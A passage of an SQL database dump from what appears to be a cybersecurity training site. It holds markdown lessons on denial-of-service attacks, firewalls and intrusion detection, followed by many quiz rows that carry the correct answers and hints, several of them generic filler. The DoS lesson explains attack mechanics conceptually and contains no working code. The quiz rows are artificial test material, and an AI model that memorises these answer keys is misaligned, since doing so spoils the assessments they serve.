(1036, 823, '# Network Denial of Service (DoS)\n\nA Denial of Service (DoS) attack aims to make a machine or network resource unavailable to its intended users. It does not aim to steal data, but rather to disrupt operations. A Distributed Denial of Service (DDoS) attack uses a botnet (thousands of compromised computers) to execute the attack simultaneously.\n\n## Layer 4: SYN Flood\nThis attack exploits the stateful nature of the TCP 3-Way Handshake.\n\n*   The attacker sends a massive flood of **SYN** requests (Step 1) to a web server.\n*   The server replies to each with a **SYN-ACK** (Step 2) and leaves a \"half-open\" connection waiting in its memory for the final **ACK** (Step 3).\n*   The attacker intentionally *never* sends the final ACK. Sometimes they even spoof the source IP address of the initial SYN, so the server is sending the SYN-ACK to a random, offline IP.\n*   **The Result:** The web server\'s memory fills up with thousands of half-open connections. Eventually, it runs out of resources and drops legitimate new connections from real customers.\n\n## Layer 3 & 4: Amplification/Reflection Attacks\nAttackers love \"Amplification\" attacks because they act as a force multiplier. They send a tiny request and generate a massive response aimed at the victim. This relies on connectionless UDP protocols.\n\n**The Smurf Attack (ICMP):**\n1.  The attacker sends an ICMP Echo Request (Ping) to a network\'s broadcast address (e.g., `192.168.1.255`).\n2.  However, the attacker *spoofs* the source IP Address of the ping to be the Victim\'s IP address.\n3.  Every single computer on that network (maybe 200 machines) receives the ping, and all 200 simultaneously reply with an ICMP Echo Reply directed at the Victim.\n4.  One tiny packet from the attacker generated 200 packets hitting the victim.\n\n**DNS/NTP Amplification:**\n1.  The attacker sends a tiny UDP DNS Query (like \"give me all records for this domain\") to an open DNS server on the internet.\n2.  They spoof the source IP to be the Victim\'s IP.\n3.  The DNS server generates a massive response (sometimes 50x larger than the request) and blasts it at the Victim.\n4.  Using a botnet, the attacker directs thousands of open DNS servers to reflect massive chunks of traffic at the victim, saturating their internet connection completely.', 'markdown', 6, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1037, 824, '# Firewalls: The First Line of Defense\n\nA firewall is a network security device that monitors and filters incoming and outgoing network traffic based on an organization\'s previously established security policies. It acts as the barrier between a trusted internal network and an untrusted external network (like the internet).\n\n## Types of Firewalls\nFirewalls have evolved significantly over the years, moving higher up the OSI model to provide better security.\n\n### 1. Packet-Filtering Firewalls (Stateless)\n*   **Operating Layer:** Layer 3 (Network) & Layer 4 (Transport).\n*   **How it works:** It looks at each individual packet in isolation. It checks the Source IP, Destination IP, Protocol, Source Port, and Destination Port against a list of rules (Access Control Lists or ACLs).\n*   **Pros:** Extremely fast and requires very little CPU power.\n*   **Cons:** \"Stateless\" means it has no memory of the connection. If you allow traffic OUT on port 80, you also have to manually write a rule allowing traffic IN from port 80 so the website can reply. This is tedious and insecure. It also cannot look inside the packet payload, so a malicious command sent over an allowed port (like HTTP 80) will pass right through.\n\n### 2. Stateful Inspection Firewalls\n*   **Operating Layer:** Layer 3 & Layer 4 (with session tracking).\n*   **How it works:** This is the standard modern firewall. It tracks the *state* of active connections. If an internal user initiates an outbound HTTP request, the firewall remembers this \"state.\" When the web server replies, the firewall automatically allows the inbound traffic because it belongs to an established, tracked session.\n*   **Pros:** Much more secure than stateless. You only need to write rules for the *initiation* of traffic.\n*   **Cons:** Still primarily focuses on IP addresses and ports, not the actual application data.\n\n### 3. Next-Generation Firewalls (NGFW)\n*   **Operating Layer:** Up to Layer 7 (Application).\n*   **How it works:** NGFWs (like Palo Alto, Fortinet, Cisco Firepower) do everything a stateful firewall does, but they also perform **Deep Packet Inspection (DPI)**. They look *inside* the payload of the packet.\n*   **Pros:** They understand applications, not just ports. An NGFW can differentiate between a user browsing Facebook (which might be allowed) and a user trying to play a game on Facebook (which might be blocked), even though both use HTTPS on Port 443. They also include built-in antivirus, intrusion prevention, and SSL decryption capabilities.\n\n## Default Deny Posture\nThe most fundamental rule of configuring *any* firewall is **Implicit Deny** or **Default Deny**. \nThis means you must explicitly define exactly what traffic is *allowed*. If traffic does not match an explicit \"Allow\" rule, the firewall drops it by default. \n\n**Deny vs Reject:**\n*   **Drop/Deny:** The firewall silently discards the packet. The sender gets no response, making it look like the IP address doesn\'t even exist. This is best practice for internet-facing interfaces to frustrate scanners.\n*   **Reject:** The firewall discards the packet but sends a polite \"Connection Refused\" (ICMP Destination Unreachable or TCP RST) back to the sender. This is sometimes used on internal networks for easier troubleshooting.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1038, 825, '# Intrusion Detection vs. Intrusion Prevention\n\nWhile firewalls enforce policy based on *who* is talking to *who*, Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) look for malicious *behavior* or known bad *signatures* within the traffic.\n\n## Intrusion Detection System (IDS)\nAn IDS is a **passive** monitoring system. It is the security equivalent of a burglar alarm. \n\n*   **How it connects:** It is normally connected to a \"SPAN port\" or \"Mirror port\" on a network switch. The switch sends a *copy* of all network traffic to the IDS. The original traffic flows uninterrupted to its destination.\n*   **Action:** When the IDS detects a threat (e.g., an SQL injection payload inside an HTTP request), it generates an alert and sends it to the SIEM for the SOC team to review.\n*   **Pros:** Because it sits out-of-band (analyzing a copy), an IDS can never accidentally block legitimate traffic (no false positive blocks). If the IDS crashes, network traffic continues to flow normally.\n*   **Cons:** It cannot stop an attack. It only alerts you that an attack is currently happening or has already succeeded. The attack traffic still reaches the target server.\n\n## Intrusion Prevention System (IPS)\nAn IPS is an **active** defense system. It is the security equivalent of an armed guard at the door.\n\n*   **How it connects:** It is deployed **in-line** with the traffic. All traffic *must* physically flow through the IPS device before reaching the internal network or servers.\n*   **Action:** When the IPS detects a threat, it doesn\'t just generate an alert; it actively **drops the malicious packets**, resets the TCP connection, and blocks the attacker\'s IP address in real-time.\n*   **Pros:** It actually stops attacks before they reach the vulnerable server.\n*   **Cons:** Because it sits in-line, a false positive is disastrous. If the IPS mistakes a legitimate customer uploading a legitimate document for a malware attack, it drops the connection, causing a business outage. Furthermore, if an in-line IPS crashes, all network traffic stops unless it fails \"open\" (which brings its own security risks).\n\n## Detection Methods\nBoth IDS and IPS use two primary methods to find evil:\n\n1.  **Signature-Based:** Works exactly like traditional antivirus. It looks for a specific string of bytes (a signature) known to belong to a specific threat, like the \"EternalBlue\" exploit. It is highly accurate but cannot detect brand new, never-before-seen (Zero-Day) attacks because no signature exists yet.\n2.  **Anomaly/Behavior-Based:** Uses machine learning and statistical baselines to learn what \"normal\" network traffic looks like over several weeks. If suddenly the database server starts downloading 50GB of data at 3 AM (which it has never done before), the system flags it as anomalous. This *can* catch Zero-Day attacks, but suffers from a much higher rate of False Positives because networks are inherently unpredictable.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55');

-- --------------------------------------------------------

--
-- Table structure for table `lesson_questions`
--

CREATE TABLE `lesson_questions` (
  `id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `question_text` text NOT NULL,
  `question_order` int(11) NOT NULL,
  `correct_answer` text NOT NULL,
  `case_sensitive` tinyint(1) DEFAULT 0,
  `hint` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `options` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL
) ;

--
-- Dumping data for table `lesson_questions`
--

INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(4164, 1, 'Which component of the CIA Triad ensures that data has not been tampered with?', 1, 'Integrity', 0, 'Think about accuracy and trustworthiness.', '2025-12-26 14:39:59', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authorization\"]'),
(4165, 1, 'What is the primary goal of a Phishing attack?', 2, 'To trick users into revealing information', 0, 'It often involves fraudulent emails.', '2025-12-26 14:39:59', '[\"To encrypt hard drives\", \"To slow down the network\", \"To trick users into revealing information\", \"To physically damage hardware\"]'),
(4166, 1, 'Who is considered the \"first line of defense\" in a security team?', 3, 'SOC Analyst', 0, 'They monitor alerts and logs daily.', '2025-12-26 14:39:59', '[\"CISO\", \"SOC Analyst\", \"HR Manager\", \"External Auditors\"]'),
(4167, 2, 'What is the first step in response?', 1, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Panic\", \"Shutdown\", \"Detection\", \"Ignoring\"]'),
(4168, 2, 'Who is the primary adversary?', 2, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"Manager\", \"System admin\", \"Regular user\"]'),
(4169, 2, 'What is the priority level?', 3, 'High priority', 0, 'Urgency level', '2025-12-26 14:39:59', '[\"No priority\", \"Optional\", \"Low priority\", \"High priority\"]'),
(4170, 3, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Log data\", \"Video streams\", \"Music files\", \"Printer ink\"]'),
(4171, 3, 'When to escalate?', 2, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"Confirmed threat\", \"False alarm\", \"User login\", \"Minor bug\"]'),
(4172, 3, 'What is the priority level?', 3, 'High priority', 0, 'Urgency level', '2025-12-26 14:39:59', '[\"High priority\", \"Low priority\", \"Optional\", \"No priority\"]'),
(4173, 4, 'What is the defensive goal?', 1, 'Protection', 0, 'Safety', '2025-12-26 14:39:59', '[\"Deleting\", \"Protection\", \"Exposure\", \"Sharing\"]'),
(4174, 4, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Panic\", \"Ignoring\", \"Shutdown\", \"Detection\"]'),
(4175, 4, 'What tool category is this?', 3, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Game engine\", \"Music player\", \"Security tool\", \"Office tool\"]'),
(4176, 5, 'Who is the primary adversary?', 1, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"System admin\", \"Manager\", \"Regular user\"]'),
(4177, 5, 'What is the main output?', 2, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Printer ink\", \"Music files\", \"Video streams\", \"Log data\"]'),
(4178, 5, 'What should you analyze first?', 3, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Lunch menu\", \"Sports scores\", \"Context\"]'),
(4179, 6, 'What is the primary goal of this concept?', 1, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Risk reduction\", \"Data deletion\", \"Cost increase\", \"System slowdown\"]'),
(4180, 6, 'What should you analyze first?', 2, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Context\", \"Sports scores\", \"Weather\", \"Lunch menu\"]'),
(4181, 6, 'When to escalate?', 3, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"False alarm\", \"Confirmed threat\", \"User login\", \"Minor bug\"]'),
(4182, 7, 'What tool category is this?', 1, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Office tool\", \"Music player\", \"Game engine\", \"Security tool\"]'),
(4183, 7, 'What is the primary goal of this concept?', 2, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Risk reduction\", \"Data deletion\", \"Cost increase\", \"System slowdown\"]'),
(4184, 7, 'Which team handles these incidents?', 3, 'SOC team', 0, 'Security Operations', '2025-12-26 14:39:59', '[\"HR Department\", \"SOC team\", \"Marketing\", \"Sales Team\"]'),
(4185, 8, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Log data\", \"Music files\", \"Printer ink\", \"Video streams\"]'),
(4186, 8, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Ignoring\", \"Panic\", \"Detection\", \"Shutdown\"]'),
(4187, 8, 'What is the primary goal of this concept?', 3, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Cost increase\", \"System slowdown\", \"Data deletion\", \"Risk reduction\"]'),
(4188, 9, 'What tool category is this?', 1, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Office tool\", \"Security tool\", \"Music player\", \"Game engine\"]'),
(4189, 9, 'What should you analyze first?', 2, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Context\", \"Lunch menu\", \"Sports scores\"]'),
(4190, 9, 'Who is the primary adversary?', 3, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"System admin\", \"Manager\", \"Regular user\"]'),
(4191, 10, 'What should you analyze first?', 1, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Sports scores\", \"Lunch menu\", \"Context\"]'),
(4192, 10, 'Which team handles these incidents?', 2, 'SOC team', 0, 'Security Operations', '2025-12-26 14:39:59', '[\"Marketing\", \"SOC team\", \"Sales Team\", \"HR Department\"]'),
(4193, 10, 'Who is the primary adversary?', 3, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"System admin\", \"Threat actor\", \"Regular user\", \"Manager\"]'),
(4194, 11, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Video streams\", \"Log data\", \"Printer ink\", \"Music files\"]'),
(4195, 11, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Shutdown\", \"Detection\", \"Panic\", \"Ignoring\"]'),
(4196, 11, 'When to escalate?', 3, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"User login\", \"False alarm\", \"Confirmed threat\", \"Minor bug\"]'),
(4197, 12, 'What is the primary goal of this concept?', 1, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Cost increase\", \"System slowdown\", \"Risk reduction\", \"Data deletion\"]'),
(4198, 12, 'When to escalate?', 2, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"Minor bug\", \"Confirmed threat\", \"User login\", \"False alarm\"]'),
(4199, 12, 'What is the defensive goal?', 3, 'Protection', 0, 'Safety', '2025-12-26 14:39:59', '[\"Exposure\", \"Deleting\", \"Protection\", \"Sharing\"]'),
(5264, 32, 'What is the standard system drive letter?', 1, 'C:', 0, 'Primary Windows drive', '2025-12-26 20:49:49', '[\"A:\", \"B:\", \"C:\", \"D:\"]'),
(5265, 32, 'Which file system is modern and supports permissions?', 2, 'NTFS', 0, 'Permissions supported', '2025-12-26 20:49:49', '[\"FAT32\", \"NTFS\", \"exFAT\", \"HFS+\"]'),
(5266, 32, 'What is the max file size for FAT32?', 3, '4 GB', 0, 'Size limit', '2025-12-26 20:49:49', '[\"2 GB\", \"4 GB\", \"8 GB\", \"Unlimited\"]'),
(5267, 33, 'What does UAC stand for?', 1, 'User Account Control', 0, 'Permission system', '2025-12-26 20:49:49', '[\"User Access Control\", \"User Account Control\", \"Unified Access Center\", \"Universal App Control\"]'),
(5268, 33, 'Which color shield indicates a trusted app?', 2, 'Blue', 0, 'Signed application', '2025-12-26 20:49:49', '[\"Red\", \"Yellow\", \"Blue\", \"Green\"]'),
(5269, 33, 'Which UAC level is the most secure?', 3, 'Always Notify', 0, 'Maximum protection', '2025-12-26 20:49:49', '[\"Always Notify\", \"Notify me only when apps try to make changes\", \"Notify me (do not dim my desktop)\", \"Never Notify\"]'),
(5270, 34, 'Which hive stores system-wide settings?', 1, 'HKLM', 0, 'LOCAL_MACHINE', '2025-12-26 20:49:49', '[\"HKCU\", \"HKLM\", \"HKU\", \"HKCR\"]'),
(5271, 34, 'What is the GUI tool for editing the registry?', 2, 'regedit', 0, 'Graphical editor', '2025-12-26 20:49:49', '[\"cmd\", \"regedit\", \"taskmgr\", \"msconfig\"]'),
(5272, 34, 'Which data type is used for text strings?', 3, 'REG_SZ', 0, 'String Value', '2025-12-26 20:49:49', '[\"REG_DWORD\", \"REG_BINARY\", \"REG_SZ\", \"REG_MULTI_SZ\"]'),
(5273, 35, 'What does AD stand for?', 1, 'Active Directory', 0, 'Directory service', '2025-12-26 20:49:49', '[\"Advanced Directory\", \"Active Directory\", \"Access Domain\", \"Admin Domain\"]'),
(5274, 35, 'Which server role authenticates users in AD?', 2, 'Domain Controller', 0, 'Runs AD DS', '2025-12-26 20:49:49', '[\"File Server\", \"Web Server\", \"Domain Controller\", \"DNS Server\"]'),
(5275, 35, 'What is the primary authentication protocol in AD?', 3, 'Kerberos', 0, 'Ticket-based', '2025-12-26 20:49:49', '[\"NTLM\", \"Kerberos\", \"Radius\", \"LDAP\"]'),
(5276, 36, 'What is the naming format for PowerShell cmdlets?', 1, 'Verb-Noun', 0, 'Action-Target', '2025-12-26 20:49:49', '[\"Verb-Noun\", \"Noun-Verb\", \"Action-Object\", \"Subject-Predicate\"]'),
(5277, 36, 'Which cmdlet lists running processes?', 2, 'Get-Process', 0, 'Usage: Get-Process', '2025-12-26 20:49:49', '[\"list-proc\", \"Get-Process\", \"Show-Tasks\", \"ps-list\"]'),
(5278, 36, 'What is the file extension for PowerShell scripts?', 3, '.ps1', 0, 'PowerShell 1', '2025-12-26 20:49:49', '[\".bat\", \".sh\", \".ps1\", \".exe\"]'),
(5279, 37, 'Which event ID indicates a successful logon?', 1, '4624', 0, 'Security Success', '2025-12-26 20:49:49', '[\"4625\", \"4624\", \"4672\", \"1074\"]'),
(5280, 37, 'Which event ID indicates a failed logon?', 2, '4625', 0, 'Security Failure', '2025-12-26 20:49:49', '[\"4624\", \"4625\", \"4768\", \"7045\"]'),
(5281, 37, 'Which log records login attempts?', 3, 'Security', 0, 'Auth events', '2025-12-26 20:49:49', '[\"System\", \"Application\", \"Security\", \"Setup\"]'),
(5282, 38, 'What does GPO stand for?', 1, 'Group Policy Object', 0, 'Config object', '2025-12-26 20:49:49', '[\"General Policy Option\", \"Group Policy Object\", \"Global Permission Order\", \"Group Permission Object\"]'),
(5283, 38, 'Which command forces a GP update?', 2, 'gpupdate /force', 0, 'Refresh command', '2025-12-26 20:49:49', '[\"gpupdate /force\", \"gprefresh\", \"update-policy\", \"gpreload\"]'),
(5284, 38, 'What is the order of GPO application?', 3, 'LSDOU', 0, 'Local, Site, Domain, OU', '2025-12-26 20:49:49', '[\"DSOUL\", \"LSDOU\", \"OUDSC\", \"SLDOU\"]'),
(5285, 39, 'Which built-in tool provides real-time virus protection?', 1, 'Windows Defender', 0, 'Antivirus', '2025-12-26 20:49:49', '[\"Windows Firewall\", \"Windows Defender\", \"BitLocker\", \"SmartScreen\"]'),
(5286, 39, 'Which Sysinternals tool is an advanced Task Manager?', 2, 'Process Explorer', 0, 'Process info', '2025-12-26 20:49:49', '[\"Process Monitor\", \"Autoruns\", \"Process Explorer\", \"PsExec\"]'),
(5287, 39, 'Which tool provides full disk encryption?', 3, 'BitLocker', 0, 'Disk security', '2025-12-26 20:49:49', '[\"SecureBoot\", \"BitLocker\", \"EFS\", \"Vault\"]'),
(5339, 22, 'Which layer is responsible for logical addressing (IPs)?', 1, 'Network', 0, 'Layer 3', '2025-12-26 20:53:36', '[\"Data Link\", \"Network\", \"Transport\", \"Session\"]'),
(5340, 22, 'What is the PDU of Layer 4 (Transport)?', 2, 'Segments', 0, 'TCP Data unit', '2025-12-26 20:53:36', '[\"Bits\", \"Frames\", \"Packets\", \"Segments\"]'),
(5341, 22, 'Which layer handles encryption and compression?', 3, 'Presentation', 0, 'Layer 6', '2025-12-26 20:53:36', '[\"Application\", \"Presentation\", \"Session\", \"Transport\"]'),
(5342, 23, 'Which protocol uses a 3-way handshake?', 1, 'TCP', 0, 'Connection-oriented', '2025-12-26 20:53:36', '[\"UDP\", \"IP\", \"TCP\", \"ICMP\"]'),
(5343, 23, 'Why is UDP used for video streaming?', 2, 'Speed', 0, 'Low overhead', '2025-12-26 20:53:36', '[\"Reliability\", \"Encryption\", \"Speed\", \"Guaranteed Delivery\"]'),
(5344, 23, 'Which TCP/IP layer corresponds to OSI Layer 3 (Network)?', 3, 'Internet', 0, 'IP Layer', '2025-12-26 20:53:36', '[\"Network Access\", \"Internet\", \"Transport\", \"Application\"]'),
(5345, 24, 'Which IP address is a private Class C address?', 1, '192.168.1.10', 0, 'Home router default', '2025-12-26 20:53:36', '[\"8.8.8.8\", \"172.16.0.1\", \"192.168.1.10\", \"10.0.0.5\"]'),
(5346, 24, 'How many bits are in an IPv4 address?', 2, '32', 0, 'Binary count', '2025-12-26 20:53:36', '[\"128\", \"64\", \"32\", \"16\"]'),
(5347, 24, 'What allows private IPs to access the internet?', 3, 'NAT', 0, 'Translation', '2025-12-26 20:53:36', '[\"DHCP\", \"DNS\", \"NAT\", \"ARP\"]'),
(5348, 25, 'What is the CIDR notation for 255.255.255.0?', 1, '/24', 0, 'Count the bits', '2025-12-26 20:53:36', '[\"/8\", \"/16\", \"/24\", \"/32\"]'),
(5349, 25, 'How many usable hosts are in a /24 network?', 2, '254', 0, '256 minus 2', '2025-12-26 20:53:36', '[\"256\", \"255\", \"254\", \"250\"]'),
(5350, 25, 'The first address in a subnet is used for what?', 3, 'Network ID', 0, 'Identification', '2025-12-26 20:53:36', '[\"Broadcast\", \"Gateway\", \"Network ID\", \"DNS\"]'),
(5351, 26, 'Which record maps a name to an IPv4 address?', 1, 'A', 0, 'Address', '2025-12-26 20:53:36', '[\"AAAA\", \"CNAME\", \"A\", \"MX\"]'),
(5352, 26, 'Which record is used for email server delivery?', 2, 'MX', 0, 'Mail Exchange', '2025-12-26 20:53:36', '[\"TXT\", \"PTR\", \"MX\", \"NS\"]'),
(5353, 26, 'What translates domain names to IPs?', 3, 'DNS', 0, 'System name', '2025-12-26 20:53:36', '[\"DHCP\", \"ARP\", \"DNS\", \"NAT\"]'),
(5354, 27, 'What is the first step in the DHCP process?', 1, 'Discover', 0, 'Looking for server', '2025-12-26 20:53:36', '[\"Offer\", \"Request\", \"Discover\", \"Acknowledge\"]'),
(5355, 27, 'What does ARP resolution map?', 2, 'IP to MAC', 0, 'Logical to Physical', '2025-12-26 20:53:36', '[\"MAC to IP\", \"IP to MAC\", \"URL to IP\", \"Port to Protocol\"]'),
(5356, 27, 'What attack relies on faking ARP replies?', 3, 'ARP Spoofing', 0, 'MITM', '2025-12-26 20:53:36', '[\"DNS Poisoning\", \"ARP Spoofing\", \"DDoS\", \"Phishing\"]'),
(5357, 28, 'Which port is used for Secure Shell (SSH)?', 1, '22', 0, 'Encrypted CLI', '2025-12-26 20:53:36', '[\"21\", \"22\", \"23\", \"25\"]'),
(5358, 28, 'Which protocol is UNSAFE for remote administration?', 2, 'Telnet', 0, 'Cleartext', '2025-12-26 20:53:36', '[\"SSH\", \"RDP\", \"HTTPS\", \"Telnet\"]'),
(5359, 28, 'Port 445 is associated with which service?', 3, 'SMB', 0, 'Windows Sharing', '2025-12-26 20:53:36', '[\"FTP\", \"SMB\", \"DNS\", \"HTTP\"]'),
(5363, 30, 'What protocol exposed the password?', 1, 'HTTP', 0, 'Unsecure', '2025-12-26 20:53:36', '[\"HTTPS\", \"SSH\", \"SFTP\", \"HTTP\"]'),
(5364, 30, 'What was the stolen password in the scenario?', 2, 'SuperSecret123', 0, 'Plaintext', '2025-12-26 20:53:36', '[\"admin\", \"password\", \"123456\", \"SuperSecret123\"]'),
(5365, 30, 'How should this login be secured?', 3, 'Use HTTPS', 0, 'Encryption', '2025-12-26 20:53:36', '[\"Use Telnet\", \"Use HTTPS\", \"Change Port\", \"Use UDP\"]'),
(5366, 31, 'Which device connects different networks (Layer 3)?', 1, 'Router', 0, 'Routing decisions', '2025-12-26 20:53:36', '[\"Switch\", \"Hub\", \"Router\", \"Bridge\"]'),
(5367, 31, 'What is the loopback address for localhost?', 2, '127.0.0.1', 0, 'Home', '2025-12-26 20:53:36', '[\"192.168.1.1\", \"0.0.0.0\", \"127.0.0.1\", \"10.0.0.1\"]'),
(5368, 31, 'Which command typically checks connectivity?', 3, 'ping', 0, 'ICMP Echo', '2025-12-26 20:53:36', '[\"ipconfig\", \"ping\", \"netstat\", \"nslookup\"]'),
(5369, 31, 'What is the subnet mask for a /24 network?', 4, '255.255.255.0', 0, 'Class C default', '2025-12-26 20:53:36', '[\"255.0.0.0\", \"255.255.0.0\", \"255.255.255.0\", \"255.255.255.255\"]'),
(5370, 31, 'Which port is used by HTTP?', 5, '80', 0, 'Unencrypted Web', '2025-12-26 20:53:36', '[\"21\", \"80\", \"443\", \"25\"]'),
(5371, 31, 'Which port is used by HTTPS?', 6, '443', 0, 'Encrypted Web', '2025-12-26 20:53:36', '[\"80\", \"8080\", \"443\", \"8443\"]'),
(5372, 31, 'Which port is used by DNS?', 7, '53', 0, 'Name Resolution', '2025-12-26 20:53:36', '[\"23\", \"53\", \"67\", \"110\"]'),
(5373, 31, 'What is Layer 1 of the OSI Model?', 8, 'Physical', 0, 'Cables and bits', '2025-12-26 20:53:36', '[\"Application\", \"Data Link\", \"Physical\", \"Transport\"]'),
(5374, 31, 'How long is a standard MAC address?', 9, '48 bits', 0, 'Hardware address', '2025-12-26 20:53:36', '[\"32 bits\", \"48 bits\", \"64 bits\", \"128 bits\"]'),
(5375, 31, 'How long is an IPv6 address?', 10, '128 bits', 0, 'Modern IP', '2025-12-26 20:53:36', '[\"32 bits\", \"64 bits\", \"128 bits\", \"256 bits\"]'),
(5376, 31, 'Which protocol guarantees delivery of data?', 11, 'TCP', 0, 'Reliable', '2025-12-26 20:53:36', '[\"UDP\", \"IP\", \"TCP\", \"ICMP\"]'),
(5377, 31, 'What is the first step in the TCP Handshake?', 12, 'SYN', 0, 'Hello', '2025-12-26 20:53:36', '[\"ACK\", \"SYN\", \"SYN-ACK\", \"FIN\"]'),
(5378, 31, 'What is the first step in DHCP?', 13, 'Discover', 0, 'Looking for IP', '2025-12-26 20:53:36', '[\"Offer\", \"Request\", \"Acknowledge\", \"Discover\"]'),
(5379, 31, 'Which of the following is a private IP address?', 14, '192.168.1.50', 0, 'RFC 1918', '2025-12-26 20:53:36', '[\"8.8.8.8\", \"1.1.1.1\", \"172.50.1.1\", \"192.168.1.50\"]'),
(5380, 31, 'What does ARP do?', 15, 'Resolves IP to MAC', 0, 'Address Resolution', '2025-12-26 20:53:36', '[\"Resolves MAC to IP\", \"Resolves Name to IP\", \"Resolves IP to MAC\", \"Routes Packets\"]'),
(5381, 31, 'Which protocol is used for ping?', 16, 'ICMP', 0, 'Internet Control Message', '2025-12-26 20:53:36', '[\"TCP\", \"UDP\", \"ICMP\", \"ARP\"]'),
(5382, 31, 'Which Layer 2 device uses MAC addresses to forward frames?', 17, 'Switch', 0, 'Intelligent forwarding', '2025-12-26 20:53:36', '[\"Hub\", \"Router\", \"Switch\", \"Repeater\"]'),
(5383, 31, 'Which DNS record type stores IPv6 addresses?', 18, 'AAAA', 0, 'Quad A', '2025-12-26 20:53:36', '[\"A\", \"MX\", \"AAAA\", \"CNAME\"]'),
(5384, 31, 'What port does standard FTP use?', 19, '21', 0, 'File Transfer', '2025-12-26 20:53:36', '[\"20\", \"21\", \"22\", \"23\"]'),
(5385, 31, 'What is the primary purpose of Wireshark?', 20, 'Packet Capture', 0, 'Analysis', '2025-12-26 20:53:36', '[\"Password Cracking\", \"Packet Capture\", \"Virus Scanning\", \"Routing\"]'),
(5427, 40, 'What does the \"C\" in CIA stand for?', 1, 'Confidentiality', 0, 'Privacy', '2025-12-26 20:58:02', '[\"Control\", \"Confidentiality\", \"Certification\", \"Compliance\"]'),
(5428, 40, 'Which concept ensures data is not altered?', 2, 'Integrity', 0, 'Accuracy', '2025-12-26 20:58:02', '[\"Availability\", \"Integrity\", \"Confidentiality\", \"Authentication\"]'),
(5429, 40, 'A DDoS attack primarily targets which pillar?', 3, 'Availability', 0, 'Uptime', '2025-12-26 20:58:02', '[\"Integrity\", \"Confidentiality\", \"Availability\", \"Authorization\"]'),
(5430, 41, 'Which is \"Something You Are\"?', 1, 'Biometrics', 0, 'Body part', '2025-12-26 20:58:02', '[\"Password\", \"Smart Card\", \"Biometrics\", \"Location\"]'),
(5431, 41, 'Which fits \"Something You Have\"?', 2, 'Smart Card', 0, 'Physical token', '2025-12-26 20:58:02', '[\"PIN\", \"Password\", \"Smart Card\", \"Typing Speed\"]'),
(5432, 41, 'Using a Password and a Fingerprint is an example of what?', 3, 'MFA', 0, 'Multi-Factor', '2025-12-26 20:58:02', '[\"Single Sign On\", \"MFA\", \"Authorization\", \"Encryption\"]'),
(5433, 42, 'Which comes first?', 1, 'Authentication', 0, 'Who are you?', '2025-12-26 20:58:02', '[\"Authorization\", \"Authentication\", \"Accounting\", \"Auditing\"]'),
(5434, 42, 'Which model uses security labels (Top Secret)?', 2, 'MAC', 0, 'Mandatory', '2025-12-26 20:58:02', '[\"DAC\", \"RBAC\", \"MAC\", \"ABAC\"]'),
(5435, 42, 'The principle of giving minimum necessary rights is called?', 3, 'Least Privilege', 0, 'Minimal', '2025-12-26 20:58:02', '[\"Zero Trust\", \"Least Privilege\", \"Defense in Depth\", \"Separation of Duties\"]'),
(5436, 43, 'Which AAA component tracks user actions?', 1, 'Accounting', 0, 'Logs', '2025-12-26 20:58:02', '[\"Authentication\", \"Authorization\", \"Accounting\", \"Access\"]'),
(5437, 43, 'Preventing a user from checking or denying an action is called?', 2, 'Non-Repudiation', 0, 'Undeniable', '2025-12-26 20:58:02', '[\"Integrity\", \"Encryption\", \"Non-Repudiation\", \"Availability\"]'),
(5438, 43, 'What is a primary use of Accounting logs?', 3, 'Forensics', 0, 'Investigation', '2025-12-26 20:58:02', '[\"Speed\", \"Encryption\", \"Forensics\", \"Routing\"]'),
(5439, 44, 'Which encryption uses the SAME key for locking and unlocking?', 1, 'Symmetric', 0, 'Single Key', '2025-12-26 20:58:02', '[\"Asymmetric\", \"Symmetric\", \"Hashing\", \"Public Key\"]'),
(5440, 44, 'Which algorithm is the current gold standard for symmetric encryption?', 2, 'AES', 0, 'Advanced Encryption Standard', '2025-12-26 20:58:02', '[\"DES\", \"AES\", \"MD5\", \"RSA\"]'),
